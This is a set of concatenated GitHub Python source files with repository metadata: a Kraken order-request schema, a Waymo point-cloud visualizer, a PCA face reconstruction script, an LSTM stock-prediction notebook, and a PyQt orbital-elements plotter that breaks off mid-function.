seconds in the future:
* `0` no expiration (default)
* `<n>` = unix timestamp of expiration time
* `+<n>` = expire `<n>` seconds from now, minimum 5 seconds
* Note that URL encoding of the `+` character changes it to a space, so please use `%2b` followed by the
number of seconds instead of `+`
closeordertype (Union[Unset, ConditionalCloseOrderType]): Conditional close order type
> Note: [Conditional close orders](https://support.kraken.com/hc/en-us/articles/360038640052-Conditional-Close)
are triggered by execution of the primary order in the same quantity and opposite direction, but once triggered
are __independent orders__ that may reduce or increase net position
closeprice (Union[Unset, str]): Conditional close order `price`
closeprice2 (Union[Unset, str]): Conditional close order `price2`
deadline (Union[Unset, str]): RFC3339 timestamp (e.g. 2021-04-01T00:18:45Z) after which the matching engine
should reject the new order request, in presence of latency or order queueing: min now() + 2 seconds, max now()
+ 60 seconds.
validate (Union[Unset, bool]): Validate inputs only. Do not submit order.
"""
ordertype: OrderType
type: TypeOrder
volume: str
pair: str
nonce: int = get_nonce()
userref: Union[Unset, int] = UNSET
displayvol: Union[Unset, str] = UNSET
price: Union[Unset, str] = UNSET
price2: Union[Unset, str] = UNSET
trigger: Union[Unset, Trigger] = Trigger.LAST
leverage: Union[Unset, str] = UNSET
reduce_only: Union[Unset, bool] = False
stptype: Union[
Unset, SelfTradePreventionStrategy
] = SelfTradePreventionStrategy.CANCEL_NEWEST
oflags: Union[Unset, str] = UNSET
timeinforce: Union[Unset, TimeInForce] = TimeInForce.GTC
starttm: Union[Unset, str] = UNSET
expiretm: Union[Unset, str] = UNSET
closeordertype: Union[Unset, ConditionalCloseOrderType] = UNSET
closeprice: Union[Unset, str] = UNSET
closeprice2: Union[Unset, str] = UNSET
deadline: Union[Unset, str] = UNSET
validate: Union[Unset, bool] = False
additional_properties: Dict[str, Any] = _attrs_field(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
nonce = self.nonce
ordertype = self.ordertype.value
type = self.type.value
volume = self.volume
pair = self.pair
userref = self.userref
displayvol = self.displayvol
price = self.price
price2 = self.price2
trigger: Union[Unset, str] = UNSET
if not isinstance(self.trigger, Unset):
trigger = self.trigger.value
leverage = self.leverage
reduce_only = self.reduce_only
stptype: Union[Unset, str] = UNSET
if not isinstance(self.stptype, Unset):
stptype = self.stptype.value
oflags = self.oflags
timeinforce: Union[Unset, str] = UNSET
if not isinstance(self.timeinforce, Unset):
timeinforce = self.timeinforce.value
starttm = self.starttm
expiretm = self.expiretm
closeordertype: Union[Unset, str] = UNSET
if not isinstance(self.closeordertype, Unset):
closeordertype = self.closeordertype.value
closeprice = self.closeprice
closeprice2 = self.closeprice2
deadline = self.deadline
validate = self.validate
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update(
{
"nonce": nonce,
"ordertype": ordertype,
"type": type,
"volume": volume,
"pair": pair,
}
)
if userref is not UNSET:
field_dict["userref"] = userref
if displayvol is not UNSET:
field_dict["displayvol"] = displayvol
if price is not UNSET:
field_dict["price"] = price
if price2 is not UNSET:
field_dict["price2"] = price2
if trigger is not UNSET:
field_dict["trigger"] = trigger
if leverage is not UNSET:
field_dict["leverage"] = leverage
if reduce_only is not UNSET:
field_dict["reduce_only"] = reduce_only
if stptype is not UNSET:
field_dict["stptype"] = stptype
if oflags is not UNSET:
field_dict["oflags"] = oflags
if timeinforce is not UNSET:
field_dict["timeinforce"] = timeinforce
if starttm is not UNSET:
field_dict["starttm"] = starttm
if expiretm is not UNSET:
field_dict["expiretm"] = expiretm
if closeordertype is not UNSET:
field_dict["close[ordertype]"] = closeordertype
if closeprice is not UNSET:
field_dict["close[price]"] = closeprice
if closeprice2 is not UNSET:
field_dict["close[price2]"] = closeprice2
if deadline is not UNSET:
field_dict["deadline"] = deadline
if validate is not UNSET:
field_dict["validate"] = validate
return field_dict
@classmethod
def from_dict(cls: Self, src_dict: Dict[str, Any]) -> Self:
d = src_dict.copy()
nonce = d.pop("nonce", get_nonce())
ordertype = OrderType(d.pop("ordertype"))
type = TypeOrder(d.pop("type"))
volume = d.pop("volume")
pair = d.pop("pair")
userref = d.pop("userref", UNSET)
displayvol = d.pop("displayvol", UNSET)
price = d.pop("price", UNSET)
price2 = d.pop("price2", UNSET)
_trigger = d.pop("trigger", UNSET)
trigger: Union[Unset, Trigger]
trigger = UNSET if isinstance(_trigger, Unset) else Trigger(_trigger)
leverage = d.pop("leverage", UNSET)
reduce_only = d.pop("reduce_only", UNSET)
_stptype = d.pop("stptype", UNSET)
stptype: Union[Unset, SelfTradePreventionStrategy]
if isinstance(_stptype, Unset):
stptype = UNSET
else:
stptype = SelfTradePreventionStrategy(_stptype)
oflags = d.pop("oflags", UNSET)
_timeinforce = d.pop("timeinforce", UNSET)
timeinforce: Union[Unset, TimeInForce]
if isinstance(_timeinforce, Unset):
timeinforce = UNSET
else:
timeinforce = TimeInForce(_timeinforce)
starttm = d.pop("starttm", UNSET)
expiretm = d.pop("expiretm", UNSET)
_closeordertype = d.pop("close[ordertype]", UNSET)
closeordertype: Union[Unset, ConditionalCloseOrderType]
if isinstance(_closeordertype, Unset):
closeordertype = UNSET
else:
closeordertype = ConditionalCloseOrderType(_closeordertype)
closeprice = d.pop("close[price]", UNSET)
closeprice2 = d.pop("close[price2]", UNSET)
deadline = d.pop("deadline", UNSET)
validate = d.pop("validate", UNSET)
add_standard_order_request_body = cls(
nonce=nonce,
ordertype=ordertype,
type=type,
volume=volume,
pair=pair,
userref=userref,
displayvol=displayvol,
price=price,
price2=price2,
trigger=trigger,
leverage=leverage,
reduce_only=reduce_only,
stptype=stptype,
oflags=oflags,
timeinforce=timeinforce,
starttm=starttm,
expiretm=expiretm,
closeordertype=closeordertype,
closeprice=closeprice,
closeprice2=closeprice2,
deadline=deadline,
validate=validate,
)
add_standard_order_request_body.additional_properties = d
return add_standard_order_request_body
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| tlg7c5/kraken-connector | kraken_connector/schemas/add_standard_order_request_body.py | add_standard_order_request_body.py | py | 13,908 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "constants.trading.OrderType",
"line_number": 103,
"usage_type": "name"
},
{
"api_name": "constants.trading.TypeOrder",
"line_number": 104,
"usage_type": "name"
},
{
"api_name": "security.get_nonce",
"line_number": 107,
"usage_type": "call"
},
{
"api... |
21904300234 | import os
from pathlib import Path
import click
import numpy as np
import tensorflow as tf
from waymo_open_dataset.dataset_pb2 import Frame
from waymo_open_dataset.utils import frame_utils, transform_utils, range_image_utils
from waymo_open_dataset import dataset_pb2
from utils import save_frame, save_points
from visualization.visu_image import plot_points_on_image, save_camera_image
from visualization.visu_point_cloud import show_point_cloud
from multiprocessing import Pool
def convert_range_image_to_point_cloud(frame, range_images, camera_projections, range_image_top_pose, ri_index=(0, 1)):
"""
Modified from the codes of Waymo Open Dataset.
Convert range images to point cloud.
Args:
frame: open dataset frame
range_images: A dict of {laser_name, [range_image_first_return, range_image_second_return]}.
camera_projections: A dict of {laser_name,
[camera_projection_from_first_return, camera_projection_from_second_return]}.
range_image_top_pose: range image pixel pose for top lidar.
ri_index: 0 for the first return, 1 for the second return.
Returns:
points: {[N, 3]} list of 3d lidar points of length 5 (number of lidars).
cp_points: {[N, 6]} list of camera projections of length 5 (number of lidars).
"""
calibrations = sorted(frame.context.laser_calibrations, key=lambda c: c.name)
points = []
cp_points = []
points_NLZ = []
points_intensity = []
points_elongation = []
frame_pose = tf.convert_to_tensor(np.reshape(np.array(frame.pose.transform), [4, 4]))
# [H, W, 6]
range_image_top_pose_tensor = tf.reshape(
tf.convert_to_tensor(range_image_top_pose.data), range_image_top_pose.shape.dims
)
# [H, W, 3, 3]
range_image_top_pose_tensor_rotation = transform_utils.get_rotation_matrix(
range_image_top_pose_tensor[..., 0], range_image_top_pose_tensor[..., 1],
range_image_top_pose_tensor[..., 2])
range_image_top_pose_tensor_translation = range_image_top_pose_tensor[..., 3:]
range_image_top_pose_tensor = transform_utils.get_transform(
range_image_top_pose_tensor_rotation,
range_image_top_pose_tensor_translation)
for c in calibrations:
points_single, cp_points_single, points_NLZ_single, points_intensity_single, points_elongation_single \
= [], [], [], [], []
for cur_ri_index in ri_index:
range_image = range_images[c.name][cur_ri_index]
if len(c.beam_inclinations) == 0: # pylint: disable=g-explicit-length-test
beam_inclinations = range_image_utils.compute_inclination(
tf.constant([c.beam_inclination_min, c.beam_inclination_max]),
height=range_image.shape.dims[0])
else:
beam_inclinations = tf.constant(c.beam_inclinations)
beam_inclinations = tf.reverse(beam_inclinations, axis=[-1])
extrinsic = np.reshape(np.array(c.extrinsic.transform), [4, 4])
range_image_tensor = tf.reshape(
tf.convert_to_tensor(range_image.data), range_image.shape.dims)
pixel_pose_local = None
frame_pose_local = None
if c.name == dataset_pb2.LaserName.TOP:
pixel_pose_local = range_image_top_pose_tensor
pixel_pose_local = tf.expand_dims(pixel_pose_local, axis=0)
frame_pose_local = tf.expand_dims(frame_pose, axis=0)
range_image_mask = range_image_tensor[..., 0] > 0
range_image_NLZ = range_image_tensor[..., 3]
range_image_intensity = range_image_tensor[..., 1]
range_image_elongation = range_image_tensor[..., 2]
range_image_cartesian = range_image_utils.extract_point_cloud_from_range_image(
tf.expand_dims(range_image_tensor[..., 0], axis=0),
tf.expand_dims(extrinsic, axis=0),
tf.expand_dims(tf.convert_to_tensor(beam_inclinations), axis=0),
pixel_pose=pixel_pose_local,
frame_pose=frame_pose_local)
range_image_cartesian = tf.squeeze(range_image_cartesian, axis=0)
points_tensor = tf.gather_nd(range_image_cartesian,
tf.where(range_image_mask))
points_NLZ_tensor = tf.gather_nd(range_image_NLZ, tf.compat.v1.where(range_image_mask))
points_intensity_tensor = tf.gather_nd(range_image_intensity, tf.compat.v1.where(range_image_mask))
points_elongation_tensor = tf.gather_nd(range_image_elongation, tf.compat.v1.where(range_image_mask))
cp = camera_projections[c.name][0]
cp_tensor = tf.reshape(tf.convert_to_tensor(cp.data), cp.shape.dims)
cp_points_tensor = tf.gather_nd(cp_tensor, tf.where(range_image_mask))
points_single.append(points_tensor.numpy())
cp_points_single.append(cp_points_tensor.numpy())
points_NLZ_single.append(points_NLZ_tensor.numpy())
points_intensity_single.append(points_intensity_tensor.numpy())
points_elongation_single.append(points_elongation_tensor.numpy())
points.append(np.concatenate(points_single, axis=0))
cp_points.append(np.concatenate(cp_points_single, axis=0))
points_NLZ.append(np.concatenate(points_NLZ_single, axis=0))
points_intensity.append(np.concatenate(points_intensity_single, axis=0))
points_elongation.append(np.concatenate(points_elongation_single, axis=0))
return points, cp_points, points_NLZ, points_intensity, points_elongation
def save_camera_images(idx: int, frame: Frame, output_dir: Path) -> None:
for image in frame.images:
save_camera_image(idx, image, frame.camera_labels, output_dir)
def save_data(frame: Frame, idx: int, points: np.ndarray,
output_dir: Path) -> None:
save_frame(frame, idx, output_dir)
save_points(idx, points, output_dir)
def visualize_camera_projection(idx: int, frame: Frame, output_dir: Path,
pcd_return) -> None:
points, points_cp = pcd_return
points_all = np.concatenate(points, axis=0)
points_cp_all = np.concatenate(points_cp, axis=0)
images = sorted(frame.images, key=lambda i: i.name) # type: ignore
# distance between lidar points and vehicle frame origin
points_tensor = tf.norm(points_all, axis=-1, keepdims=True)
points_cp_tensor = tf.constant(points_cp_all, dtype=tf.int32)
mask = tf.equal(points_cp_tensor[..., 0], images[0].name)
points_cp_tensor = tf.cast(tf.gather_nd(
points_cp_tensor, tf.where(mask)), tf.float32)
points_tensor = tf.gather_nd(points_tensor, tf.where(mask))
projected_points_from_raw_data = tf.concat(
[points_cp_tensor[..., 1:3], points_tensor], -1).numpy()
plot_points_on_image(
idx, projected_points_from_raw_data, images[0], output_dir)
def pcd_from_range_image(frame: Frame):
def _range_image_to_pcd(ri_index: int = 0):
# points, points_cp = frame_utils.convert_range_image_to_point_cloud(
# frame, range_images, camera_projections, range_image_top_pose,
# ri_index=ri_index)
points, points_cp = convert_range_image_to_point_cloud(
frame, range_images, camera_projections, range_image_top_pose,
ri_index=ri_index)
return points, points_cp
parsed_frame = frame_utils.parse_range_image_and_camera_projection(frame)
range_images, camera_projections, _, range_image_top_pose = parsed_frame
frame.lasers.sort(key=lambda laser: laser.name)
return _range_image_to_pcd(), _range_image_to_pcd(1)
# def visualize_pcd_return(frame: Frame, pcd_return,
# visu: bool) -> None:
# points, points_cp = pcd_return
# points_all = np.concatenate(points, axis=0)
# # print(f'points_all shape: {points_all.shape}')
# # camera projection corresponding to each point
# points_cp_all = np.concatenate(points_cp, axis=0)
# # print(f'points_cp_all shape: {points_cp_all.shape}')
# if visu:
# show_point_cloud(points_all, frame.laser_labels)
def process_data(idx: int, frame: Frame, output_dir: Path, save: bool,
visu: bool) -> None:
print(f'Start to process frame {idx:03}')
# pylint: disable=no-member (E1101)
# frame = Frame()
# frame.ParseFromString(bytearray(data.numpy()))
range_images, camera_projections, range_image_top_pose = frame_utils.parse_range_image_and_camera_projection(frame)
points, cp_points, points_in_NLZ_flag, points_intensity, points_elogation = convert_range_image_to_point_cloud(
frame, range_images, camera_projections, range_image_top_pose, ri_index=(0, )
)
points_all = np.concatenate(points, axis=0)
points_in_NLZ_flag = np.concatenate(points_in_NLZ_flag, axis=0).reshape(-1, 1)
points_intensity = np.concatenate(points_intensity, axis=0).reshape(-1, 1)
points_elogation = np.concatenate(points_elogation, axis=0).reshape(-1, 1)
points_all[points_in_NLZ_flag.reshape(-1) == -1]
# pcd_return_1, pcd_return_2 = pcd_from_range_image(frame)
# visualize_pcd_return(frame, pcd_return_1, visu)
# visualize_pcd_return(frame, pcd_return_2, visu)
# concatenate 1st and 2nd return
# points, _ = concatenate_pcd_returns(pcd_return_1, pcd_return_2)
if visu:
save_camera_images(idx, frame, output_dir)
show_point_cloud(points_all, frame.laser_labels, idx, output_dir)
visualize_camera_projection(idx, frame, output_dir, (points, cp_points))
if save:
save_data(frame, idx, points, output_dir)
def process_segment(segment_path: str, output_dir: Path, save: bool,
visu: bool, parallelism: int=1) -> None:
data_set = tf.data.TFRecordDataset(segment_path, compression_type='')
frame_list = []
for idx, data in enumerate(data_set):
print(f'Loading frame: {idx}')
frame = Frame()
frame.ParseFromString(bytearray(data.numpy()))
frame_list.append(frame)
# multiprocessing?
if parallelism > 0:
arg_list = []
for idx, frame in enumerate(frame_list):
arg_list.append((idx, frame, output_dir, save, visu))
with Pool(parallelism) as pool:
pool.starmap(process_data, arg_list)
else:
for idx, frame in enumerate(frame_list):
process_data(idx, frame, output_dir, save, visu)
@click.command(help='Point Cloud Visualization Demo')
@click.option('--save/--no-save', 'save', default=False,
help='save frames and concatenated point clouds to disk')
@click.option('--visu/--no-visu', 'visu', default=False,
help='visualize point clouds and save images')
@click.argument('segment_path', type=click.Path(exists=True))
@click.argument('output_dir', type=click.Path(exists=True))
def main(save: bool, visu: bool, segment_path: str, output_dir: str) -> None:
if os.path.basename(segment_path).split('.')[-1] != 'tfrecord':
raise ValueError(f'segment file has to be of '
f'{tf.data.TFRecordDataset.__name__} type')
process_segment(segment_path, Path(output_dir), save, visu, 0)
if __name__ == '__main__':
# pylint: disable=no-value-for-parameter
main()
| friskit-china/waymo-open-dataset-visualizer | main.py | main.py | py | 11,384 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.convert_to_tensor",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "tensorflow.res... |
8167059453 | import sys
import os
import numpy as np
from numpy.linalg import svd
from numpy.linalg import eig
from skimage import io
from skimage import transform
face_folder = sys.argv[1]
if face_folder[len(face_folder)-1] != '/':
face_folder += "/"
target = sys.argv[2]
image_data = []
for file in os.listdir(face_folder):
filepath = os.path.join(face_folder , file)
img = io.imread(filepath)
img = np.array(img)
img = img.flatten()
image_data.append(img)
image_data = np.array(image_data)
image_data_mean = np.mean(image_data,axis=0)
x = image_data - image_data_mean
U, s, V = np.linalg.svd(x.T , full_matrices=False)
target = face_folder + target
ori_img = io.imread(target)
ori_img = np.array(ori_img)
ori_img = np.reshape(ori_img , (1,1080000))
ori_img = ori_img - image_data_mean
weights = np.dot( ori_img , U[:,:4])
recon = image_data_mean + np.dot(weights, U[:,:4].T)
recon = np.reshape(recon,(600,600,3))
recon -= np.min(recon)
recon /= np.max(recon)
recon = (recon*255).astype(np.uint8)
io.imsave('reconstruction.png', recon)
| muachilin/Machine-Learning | hw4/pca.py | pca.py | py | 1,052 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sys.argv",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_numbe... |
11783428086 |
# coding: utf-8
# In[1]:
#get_ipython().system(u'jupyter nbconvert --to script lstm_model.ipynb')
import os
import sys
import time
import pandas as pd
import datetime
#import pandas.io.data as web
from pandas_datareader import data
import matplotlib.pyplot as plt
from matplotlib import style
import glob
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout
from keras.layers import Activation, LSTM
from keras.utils import plot_model
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
from math import sqrt
from keras.callbacks import EarlyStopping
#import load_data
# fix random seed for reproducibility
np.random.seed(7)
# In[2]:
days_for_prediction = 30
source_dir='../data/samples'
models_dir = '../models/lstm/'
supervised_data_dir = '../data/samples2'
prediction_data_dir = '../data/prediction/samples'
rmse_csv = '../data/rsme_ltsm.csv'
# # Build train and test datasets
# In[3]:
# frame a sequence as a supervised learning problem
def to_supervised(df, lag, org_col_name='Adj Close', new_col_name='Adj Close+'):
# new_col_name's data is created by shifting values from org_col_name
df[new_col_name] = df.shift(-lag)[org_col_name]
# Remove the last lag rows
df = df.head(len(df) - lag)
df.fillna(0, inplace=True)
return df
def create_supervised_filename(directory, ticker):
return os.path.join(directory, ticker + "_supervised.csv")
def create_supervised_data(source_dir, dest_dir, days_for_prediction=30, new_col_name = 'Adj Close+'):
'''
Input:
- source_dir: directory where the stock price CSVs are located
- days_for_prediction: number of days for the prediction prices. Must be at least 30 days
Description:
Read csv files in source_dir, load into dataframes and split into
X_train, Y_train, X_test, Y_test
'''
#assert (days_for_prediction >= 30), "days_for_prediction must be >= 30"
csv_file_pattern = os.path.join(source_dir, "*.csv")
csv_files = glob.glob(csv_file_pattern)
dfs = {}
for filename in csv_files:
arr = filename.split('/')
ticker = arr[-1].split('.')[0]
new_file = create_supervised_filename(dest_dir, ticker)
#print(ticker, df.head())
# Date, Open, High , Low , Close, Adj Close, Volume
#df = pd.read_csv(filename, parse_dates=[0]) #index_col='Date')
# Open, High , Low , Close, Adj Close, Volume
df = pd.read_csv(filename, index_col='Date')
#print('Before\n', df[30:40])
#print(df.shift(2)['Adj Close'].head())
df = to_supervised(df, days_for_prediction, new_col_name=new_col_name)
df.to_csv(new_file)
#print('Adding new column...\n', df[['Adj Close', new_col_name]].head(days_for_prediction+1))
#print('After\n', df.tail())
dfs[ticker] = df
print(ticker, filename, new_file)
return dfs
# # Use LSTM model for each stock
# In[4]:
dfs = create_supervised_data(source_dir=source_dir, dest_dir=supervised_data_dir, days_for_prediction=days_for_prediction)
# In[5]:
def create_lstm_model(max_features, lstm_units):
model = Sequential()
#model.add(LSTM(neurons, input_shape=(None, X_train.shape[1]), return_sequences=True)) #, dropout=0.2))
#model.add(LSTM(max_features, batch_input_shape=(batch_size, None, train_X[i].shape[1]), dropout=0.2, stateful=True))
#model.add(LSTM(1, input_shape=(max_features,1), return_sequences=True, dropout=0.2))
#model.add(LSTM(max_features, return_sequences=False, dropout=0.2))
#model.add(LSTM(input_dim=max_features, output_dim=300, return_sequences=True))
model.add(LSTM(units=lstm_units[0], input_shape=(None, max_features), return_sequences=True))
model.add(Dropout(0.2))
model.add(LSTM(lstm_units[1], return_sequences=False))
model.add(Dropout(0.2))
#model.add(Dense(1)) #, activation='sigmoid'))
model.add(Dense(1, activation='linear'))
#model.compile(loss='mse', optimizer='rmsprop')
#model.compile(loss='binary_crossentropy',optimizer='rmsprop', metrics=['accuracy'])
#model.compile(loss='mean_squared_error', optimizer='adam')
model.compile(loss='mse', optimizer='rmsprop', metrics=['accuracy'])
return model
# In[6]:
'''
def create_train_test(data):
X,y = data[:,0:-1], data[:, -1]
# Transform scale
X_scaler = MinMaxScaler(feature_range=(-1, 1))
y_scaler = MinMaxScaler(feature_range=(-1, 1))
scaled_X = X_scaler.fit_transform(X)
scaled_y = y_scaler.fit_transform(y)
print(scaled_y)
# Now split 80/20 for train and test data
#train_count = int(.8*len(data))
# last test_days is for test; the rest is for train
test_days = 90
train_count = len(data) - test_days
X_train, X_test = scaled_X[:train_count], scaled_X[train_count:]
y_train, y_test = scaled_y[:train_count], scaled_y[train_count:]
return y_scaler, X_train, y_train, X_test, y_test
'''
def create_train_test2(data):
#X,y = data[:,0:-1], data[:, -1]
# Transform scale
scaler = MinMaxScaler(feature_range=(-1, 1))
scaled_data = scaler.fit_transform(data)
# Now split 80/20 for train and test data
#train_count = int(.8*len(data))
# last test_days is for test; the rest is for train
test_days = 90
train_count = len(data) - test_days
train, test = scaled_data[:train_count], scaled_data[train_count:]
X_train, y_train = train[:,0:-1], train[:, -1]
X_test, y_test = test[:,0:-1], test[:, -1]
return scaler, X_train, y_train, X_test, y_test
def build_models(models_dir, supervised_data_dir, lstm_units):
# Define early stopping
early_stopping = EarlyStopping(monitor='val_loss', patience=2) #value=0.00001
rmse_list = list()
models = {}
predicted_dfs = {}
'''
load supervised data
create and save models
'''
csv_file_pattern = os.path.join(supervised_data_dir, "*.csv")
csv_files = glob.glob(csv_file_pattern)
dfs = {}
print_first_model=True
for filename in csv_files:
data = pd.read_csv(filename, index_col='Date')
#print(data.head())
arr = filename.split('/')
ticker = arr[-1].split('.')[0].split('_')[0]
print('Processing', ticker)
max_features = len(data.columns) -1
#y_scaler, X_train, y_train, X_test, y_test = create_train_test(data.values)
scaler, X_train, y_train, X_test, y_test = create_train_test2(data.values)
model = create_lstm_model(max_features, lstm_units)
#plot_model(model, to_file=ticker + '.png', show_shapes=True, show_layer_names=True)
if print_first_model:
print(model.summary())
print_first_model = False
# Train data
x1 = np.reshape(X_train, (X_train.shape[0], 1, X_train.shape[1]))
y1 = np.reshape(y_train, (y_train.shape[0], 1))
print(x1.shape, y1.shape)
# Test data
x2 = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))
y2 = np.reshape(y_test, (y_test.shape[0], 1))
#model.fit(x, y, batch_size=100, epochs=5, shuffle=True)
print('Training...')
#model.fit(x1, y1, batch_size=50, epochs=20, verbose=1, validation_split=0.2, callbacks=[early_stopping])
# Note: Early stopping seems to give worse prediction?!! We want overfitting here?
model.fit(x1, y1, batch_size=5, epochs=20, verbose=1, validation_data=(x2, y2)) #, callbacks=[early_stopping])
model_fname = os.path.join(models_dir, ticker + ".h5")
print('Saving model to', model_fname)
model.save(model_fname)
# In[ ]:
# inverse scaling for a forecasted value
def invert_scale(scaler, X, value):
new_row = np.column_stack((X,value)) #[x for x in X] + [value]
inverted = scaler.inverse_transform(new_row)
return inverted[:, -1]
'''
Predict and evaluate test data
'''
def predict_evaluate(models_dir, supervised_data_dir, predicted_dir, rsme_csv):
model_file_pattern = os.path.join(models_dir, "*.h5")
model_files = glob.glob(model_file_pattern)
predicted_dfs = {}
rmse_list = list()
print(model_file_pattern)
for model_file in model_files:
print('loading', model_file)
arr = model_file.split('/')
ticker = arr[-1].split('.')[0]
'''
Read supervised data and set up test data for prediction
'''
supervised_filename = create_supervised_filename(supervised_data_dir, ticker)
data = pd.read_csv(supervised_filename, index_col='Date')
scaler, X_train, y_train, X_test, y_test = create_train_test2(data.values)
# Test data
x2 = np.reshape(X_test, (X_test.shape[0], 1, X_test.shape[1]))
y2 = np.reshape(y_test, (y_test.shape[0], 1))
print('Predicting...')
model = load_model(model_file)
predicted = model.predict(x2)
predict_inversed = invert_scale(scaler, X_test, predicted)
actual_inversed = invert_scale(scaler, X_test, y_test)
rmse = sqrt(mean_squared_error(actual_inversed, predict_inversed))
print('Test RMSE: %.3f' % rmse)
rmse_list += [[ticker,rmse]]
predicted_dfs[ticker] = pd.DataFrame({'predicted': predict_inversed.reshape(len(predict_inversed)),
'actual': actual_inversed.reshape(len(actual_inversed))})
predicted_file = os.path.join(predicted_dir, ticker + "_predicted.csv")
print("Writing to", predicted_file)
predicted_dfs[ticker].to_csv(predicted_file, index=False)
rmse_df = pd.DataFrame(rmse_list, columns=['Stock Model', 'rsme'])
rmse_df = rmse_df.sort_values(by='rsme')
rmse_df.to_csv(rsme_csv, index=False)
return predicted_dfs, rmse_df
# In[ ]:
build_models(models_dir, supervised_data_dir, lstm_units=[40,10])
# In[ ]:
predicted_dfs, rmse_df = predict_evaluate(models_dir,
supervised_data_dir,
prediction_data_dir,
rmse_csv)
# In[ ]:
rmse_df
# In[ ]:
# Plot stocks based on rmse order (best -> worst)
#cnt = 0
#for index, row in rmse_df.iterrows():
# key = row['Stock Model']
# predicted_dfs[key].plot(title=key + ': predicted vs actual')
# plt.show()
# In[ ]:
'''
cnt = 1
for index, row in rmse_df.iterrows():
key = row['Stock Model']
if (cnt % 2 != 0):
fig, axes = plt.subplots(nrows=1, ncols=2)
ax=axes[0]
else:
ax=axes[1]
predicted_dfs[key].plot(title=key + ': price vs days', figsize=(15,4), ax=ax)
cnt += 1
plt.show()
'''
# In[ ]:
| thongnbui/MIDS_capstone | code/lstm_model.py | lstm_model.py | py | 10,757 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.random.seed",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_... |
38199809243 | import sys
from PyQt5.QtWidgets import QMainWindow, QApplication, QDesktopWidget, QFileDialog
from PyQt5.QtGui import QPalette, QColor
import numpy as np
from typing import *
import json
import qtmodern.styles
import qtmodern.windows
from MyModules.MyWindow import Ui_MainWindow
from MyModules.Orbits import Satellite
from MyModules.MPL3Dwidget import *
class MainWindow(QMainWindow, Ui_MainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.setupUi(self)
self.center()
# Create the matplotlib 3D plot
self.plotCanvas = MplCanvas(self.plotWidget, width=5, height=5, dpi=100)
self.toolbar = NavigationToolbar(self.plotCanvas, self.plotWidget)
self.plotLayout.addWidget(self.plotCanvas)
self.plotLayout.addWidget(self.toolbar)
self.plotWidget.setLayout(self.plotLayout)
# connect every slider to the function that handles the ploting
sliders = [self.slider_MA, self.slider_AOP, self.slider_ECC, self.slider_INC, self.slider_LAN, self.slider_SMA]
for slider in sliders:
slider.sliderReleased.connect(self.slider_released)
self.slider_released() # Initialize the plot
self.actionExport_to_json.triggered.connect(lambda: self.export_to_json())
self.actionImport_from_json.triggered.connect(lambda: self.import_from_json())
self.planet_actions = [self.actionMercury, self.actionVenus, self.actionEarth, self.actionMars,
self.actionJupiter, self.actionSaturn, self.actionUranus, self.actionNeptune, self.actionPluto]
for act in self.planet_actions:
act.triggered.connect(lambda: self.display_planets())
def center(self):
""" This function centers the window at launch"""
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def slider_released(self):
""" Triggered when a slider is released. Computes the new positions and plots the new graph"""
pos = self.calculate_position(self.getSliderValues())
self.plot(pos)
def plot(self, pos):
""" Handles the ploting"""
self.plotCanvas.axes.cla()
self.plotCanvas.axes.plot(pos[:, 0], pos[:, 1], pos[:, 2], 'o', markersize=1)
self.plotCanvas.axes.plot([0], [0], [0], 'o', color='yellow', markersize='10')
self.plotCanvas.axes.mouse_init(rotate_btn=1, zoom_btn=3)
set_axes_equal(self.plotCanvas.axes)
self.plotCanvas.fig.set_facecolor(plot_background_color)
self.plotCanvas.axes.patch.set_facecolor(plot_face_color)
self.plotCanvas.draw()
def getSliderValues(self) -> List[float]:
""" Returns the current values displayed by the sliders"""
return [float(self.slider_SMA.value()),
float(self.slider_INC.value()),
float(self.slider_ECC.value()) / 1e3,
float(self.slider_LAN.value()),
float(self.slider_AOP.value()),
float(self.slider_MA.value())]
def setSliderValues(self, values: Dict[str, float]):
self.slider_SMA.setValue(int(values['SMA']))
self.slider_INC.setValue(int(values['INC']))
self.slider_ECC.setValue(int(values['ECC'] * 1e3))
self.slider_LAN.setValue(int(values['LAN']))
self.slider_AOP.setValue(int(values['AOP']))
self.slider_MA.setValue(int(values['MA']))
self.slider_released()
def calculate_position(self, values: List[float]):
obj = Satellite(*values)
time = np.linspace(0, obj.T, 200)
pos = obj.orbitalparam2vectorList(time)
return pos
def export_to_json(self):
"""Writes the current values of the sliders to a new JSON file"""
file_name = self.FileDialog()
with open(file_name, 'w') as f:
keys = ["SMA", "INC", "ECC", "LAN", "AOP", "MA"]
values = self.getSliderValues()
json.dump(dict(zip(keys, values)), f)
def import_from_json(self):
file_name = self.FileDialog(save=False)
with open(file_name, 'r') as f:
content = json.load(f)
self.setSliderValues(content)
def FileDialog(self, save=True):
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
if save:
file_name, _ = QFileDialog.getSaveFileName(
self, "Save as", "", "JSON Files (*.json)", options=options)
else:
file_name, _ = QFileDialog.getOpenFileName(
self, "Open", "", "JSON Files (*.json)", options=options)
if file_name != '':
